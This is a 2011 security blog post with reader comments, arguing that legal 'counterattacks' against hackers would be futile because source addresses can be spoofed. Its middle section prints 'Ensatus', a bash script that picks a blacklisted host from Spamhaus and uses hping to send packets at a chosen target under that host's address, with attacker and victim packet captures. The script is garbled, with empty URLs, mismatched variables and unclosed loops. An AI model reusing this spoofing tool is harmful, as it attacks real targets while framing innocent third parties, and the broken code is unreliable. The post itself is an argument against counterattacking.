The Art of Cyber Warfare: Counterattack Fail

Monday, April 18, 2011

J. Oquendo


Across the United States, we enjoy the protections of not only the Constitution but also our State constitutions which almost follow to the letter, the U.S. Constitution. 

Using a snippet from the State of California we have: "All people are by nature free and independent and have inalienable rights. Among these are enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy."

Pennsylvania [2], Maine [3], New Hampshire [4], Idaho [5] and other states have similar, if not the same wording.

Following the words to the letter, how can we apply the same rights to today's rapid changing world of information security. With so many laws coming and going, I decided to take a walk on the wild side and legally claim that I can counter-hack an attacker. 

To understand how will require a bit of skepticism and a desire to become case law, nevertheless, I will point out my reasoning for being able to counterattack a hacker trying to compromise my network. As with the information I will also point out why counterattacking will never work.

Initially I was not going to get into this topic, however I have received more and more e-mails this quarter concerning counterattacking. Personally, I see it as a pointless task littered with free tickets to club fed, however, hopefully someone in the legal realm could chime in with a counter article or commentary.

In trying to write this, I spent quite a few hours trying to track down a security incident that happened in the early 90's. The security incident involved someone in the military who had broken into another machine in the military. He was arrested, charged, but found not guilty of hacking.

You see, back then, banners were non-existent. He never had a warning telling him "thou shall not hack into thy superior's machines" therefore he skated away on a technicality. This led to the warning banners many systems and network administrators implement across machines [6] and while many may not know of the origin of this "pseudo-law," many practice creating "Warning Banners."

With the brief security history out of the way, there is no need to introduce the history of SLAs or TOS agreements, we just know that in order for our interconnections to work we will have an SLA and TOS in almost all businesses that dictate what both parties can and can't do and what they can or can't expect out of the partnership slash agreement.

Imagine the following banner for a moment:

$more /etc/motd

Cyber Warfare Counter Attack Fail

It is a simple and straightforward warning. In order for you to connect to me, you must allow my systems to check the weaknesses in your systems. As a partnership, this is actually beneficial as I could notify you of vulnerabilities before an attacker reaches them.

On the other hand, I am placing myself in harm's way via way of potential loss of clients, lawsuits from someone who did not read the TOS or SLAs not to mention the banner, higher rates from a carrier for potential excessive use of bandwidth, not to forget mentioning, interconnected peers and networks will not be happy about what appears to be an attack leaving my network which could lead to blacklisted.

Nevertheless, legally, I am covering myself with wording. Not only covering myself with my wording, but to a degree "enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy." As a provider of a service, I have the right to protect my privacy since it is my system, and the privacy of the data that reside on my systems.

Ironic how broadly some laws can be defined and interpreted. Because those laws are older than most computers, they are not necessarily applicable simply because they are not tested. Does this mean we should turn the Internet into the Wild Wild West? Not really unless you want to pursue a stint in federal prison while you either make or test case law.

Let us now imagine that this indeed was the case, one could counterattack based on an absurd TOS, SLA or other type of legal verbiage. "Counterattacking is now legal!!!" Game over. Not for you, not for me, not for the attacker. Rather, but for almost everyone who is interconnected, as it will be the equivalent of a constant "cyberdrive-by" shooting. With absolutely no winners, only losers.

Because counterattacking is legal (remember we're imaging it is), I reserve the right to perform a penetration test against anyone connecting to me. But who is exactly connecting to me. I will never be able to see who is behind an IP and therein lies the problem. I pointed this out in the "Decomposition Fail" chapter [7] on my "Art of Cyberwarfare" series. IP is not an identifier especially when it comes to "cyberwarfare."

To drive a point home, here is a concoction I whipped up called Ensatus. The purpose of Ensatus is to attack a target of my choice while picking out an already established bad guy and pretending to be that bad guy.

The sole purpose of Ensatus is deception and it drives the point of "fail" when it comes to counterattacking. If I were performing a sanctioned penetration test, there is a high likelihood that I would be using decoys. In the event counterattacking were legal, you would be counterattacking an innocent victim at that point.

# Ensatus v.0 (there will be no other versions...)
# J. Oquendo

# Proof of concept diversion/covertness generation script.
# Concept is simple, go out get a random "dirty host" via
# Spamhaus in this instance then use that host as a source
# of an attack. To be used while one is say performing a
# penetration test. The goal is simple to generate dirty
# traffic in an effort to "blend in with the crowd."

# Because I like ugly

ranport=$(( 1+( $(od -An -N2 -i /dev/random) )%(32-1+1) ))
sndport=`echo $ranport | sed 's:-::g' | sed -n '1p'`
pktsnum=$(( 500+( $(od -An -N2 -i /dev/random) )%(500-1+1) ))
randnet=`echo "sed -n '$rantarg" | sed 's:$:p'\'' /tmp/suckers:g'|sh`

wget -qO - | awk -F "/" '{print $1}' |\
sed 's:0$::g;s:$\.::g' > /tmp/suckers

if [ ! -f $sucker ];


wget -qO - |\
awk -F "/" '{print $1}' | sed 's:0$::g;s:$\.::g' > /tmp/suckers


echo "Enter target"
read targeted

echo sending hping -8 $sndport -c $pktnum -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g'
echo "How many instances should we send out? (enter a number)"

read number


while [ $i -lt 10 ]


echo hping -8 $sndport -c $sndport -i 100 -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g' |\ sh &



Does it work? From the attacker machine: (sanitized for a clean look)

root@axios:~/ENS# uname -a
Linux axios #1 SMP Thu Jun 18 10:57:32 EDT 2009 i686 GNU/Linux

root@axios:~/ENS# ./

Enter target

sending hping -8 24 -c -a

How many instances should we send out? (enter a number)


Scanning (, port 24

1 ports to scan, use -V to see all the replies

|port| serv name |  flags  |ttl| id  | win |


On the victim end this is the output via Wireshark [8]:

root@chousen:/home/sil# uname -a
Linux chousen 2.6.35-27 SMP Tue Feb 22 20:25:29 UTC 2011 i686 GNU/Linux

root@chousen:/home/sil# tshark -i eth0 -R "ip.addr ==" > OUT.txt                                                                                                 
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
^C20 packets captured

root@chousen:/home/sil# more OUT.txt
1.348529 ->   TCP rap-listen > 24 [] Seq=1 Win=512 Len=0
1.348576 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 ->   TCP [TCP Dup ACK 18#1] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.356196 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.386481 ->   TCP [TCP Dup ACK 18#2] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.386502 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.464751 ->   TCP [TCP Dup ACK 18#3] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.464780 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.554046 ->   TCP [TCP Dup ACK 18#4] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.554074 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.596722 ->   TCP [TCP Dup ACK 18#5] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.596748 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.607143 ->   TCP [TCP Dup ACK 18#6] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.607164 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.648786 ->   TCP [TCP Dup ACK 18#7] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.648805 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.724455 ->   TCP [TCP Dup ACK 18#8] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.724499 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.740352 ->   TCP [TCP Dup ACK 18#9] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.740375 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

Now, imagine if the victim machine were to counterattack, both sides lose. Not only would both sides lose, but everyone in between would lose as the victim would need to use bandwidth to counter, not to forget that the other side is also victim. If that side also had a counterattacking mechanism in place, you'd have the equivalent of a reflection between two mirrors, never ending.

We must remember that many attackers are never going to come from their true address. So what would be the point of even attempting to ever counterattacking or even creating an application or system that does so.

On the contrary, this will lead to more problems than one could ever wish for. Also, because of the flaws in the common structure of IP, it would be likely that attackers would endorse these absurd products. While these systems would be busy countering ghosts, an attacker would then have greater capabilities of blending in the crowd.

After all that has been written, I do believe that it would be possible to counterattack legally, however, it would be as absurd as believing that it would make an iota of a difference in either stopping an attacker, future attacks, deterring potential attackers, or even gathering any actionable information about a real attacker.


Cross-posted from Infiltrated

Possibly Related Articles:
Information Security
Legal Hacking Penetration Testing Proof of Concept Cyber Warfare Counterattack
Post Rating I Like this!
Matthew Ancelin J, I truly appreciate your article- and it does ring true as to how things would play out in 'legal counterattack' world. I don't think that anyone reading this would disagree that we DO counterattack from a law enforcements/fed agency level today...example would be the Stuxnet attack against Iran's nuclear program. Just this morning, I see this article: once again citing that our favorite new business partner, China, is also simultaneously attacking us daily. If widespread counter-attack is not feasible, I guess the hidden-war will rage on- government vs. government, company vs. company.
Robert Gezelter This has always been true.

Systems managers and IT security personnel are not authorized to take offensive action. While satisfying, "Fire if fired upon" is a concept appropriate for armed services, not civilians.

In the Computer Security Handbook, 4th Edition (2002), I noted this in two places:
- in Sections 21.1.6, et. seq., (pp 21-3), I noted that "counter battery" is not an acceptable response to a cyber attack.

- the conclusion of Section 22.4, "Rules of Engagement" (pp 22-10):

"In summary, when protecting Web sites and customers, defensive actions are almost always permissible, and offensive actions are any kind are almost always impermissible. Defensive actions that are transparent to the customer are best of all."
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.